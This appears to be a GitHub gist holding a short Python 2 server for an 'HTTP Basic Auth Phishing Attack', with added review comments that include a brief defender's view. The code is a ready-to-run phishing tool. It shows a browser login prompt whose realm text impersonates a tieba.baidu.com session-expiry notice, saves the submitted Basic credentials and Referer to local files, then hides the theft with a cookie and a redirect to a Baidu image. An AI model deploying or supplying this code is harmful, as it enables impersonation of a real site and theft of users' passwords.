@lijiejie
Last active August 10, 2016 04:09
HTTP Basic Auth Phishing Attack
#encoding=utf-8
import SimpleHTTPServer
import SocketServer
import time
# GET handler for the "HTTP Basic Auth Phishing Attack" demo named in the title.
# Each request is answered in one of three ways, chosen by substring matches on
# the stringified request headers (no cookie or header parsing is done).
# NOTE(review): indentation was lost in this listing; the nesting is read from
# the if/else keywords only.
#
# Defender's view:
# - The text shown in the browser's credential prompt comes from the realm
#   string the server sends; it is attacker-chosen and says nothing about who
#   receives the credentials. They go to the host that answered with the 401.
# - Observable signals in traffic: a 401 carrying `WWW-Authenticate: Basic`
#   whose realm names a different site than the responding host, followed by a
#   302 that sets `UserLogin=1`.
# - Sites that render user-supplied resource URLs can keep third-party auth
#   prompts away from visitors by proxying or re-hosting those resources.
#   Current browsers presumably suppress such prompts for cross-origin
#   subresources; verify for the browsers you support.
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
def do_GET(self):
# Case 1: the marker cookie text is already present in the headers, so the
# client is sent straight to the image with no further prompt.
if str(self.headers).find('UserLogin=1') > 0: # user already recorded, redirect
self.send_response(302)
self.send_header('Location','http://www.baidu.com/img/bdlogo.gif')
self.end_headers()
else:
# Case 2: the browser answered an earlier 401 and sent Basic credentials.
if str(self.headers).find('Authorization: Basic ') > 0: # save the account, password and Referrer
self.send_response(302)
# Marks this client so later requests take the case-1 branch.
self.send_header('Set-Cookie', 'UserLogin=1')
self.send_header('Location','http://www.baidu.com/img/bdlogo.gif')
# Writes every request header to a timestamp-named file under data\.
# That includes the Authorization value (Basic credentials are only
# base64-encoded, not encrypted) and any Referer the browser sent.
with open('data\\' + time.asctime().replace(':', ' ') + '.txt', 'w') as f:
f.write(str(self.headers))
else:
# Case 3: no credentials yet. A 401 with a Basic challenge makes the browser
# show its native login dialog; the realm text imitates a session-expiry
# notice that names tieba.baidu.com.
self.send_response(401)
self.send_header('Content-type','text/html; charset=UTF-8')
self.send_header('WWW-Authenticate', 'Basic realm="Session Out Of Date, Please Login again [tieba.baidu.com]"')
# NOTE(review): with indentation lost, it is not visible whether this call
# belongs only to the 401 branch or to both branches of the inner if/else.
# Confirm against the original listing.
self.end_headers()
# TCP port the demo server listens on.
PORT = 1234
# The empty host string binds all local interfaces, not just loopback.
httpd = SocketServer.TCPServer(("", PORT), RequestHandler)
# Python 2 print statement; the SimpleHTTPServer and SocketServer modules used
# by this file are also Python 2 names.
print "serving at port", PORT
# Blocks here and serves requests until the process is stopped.
httpd.serve_forever()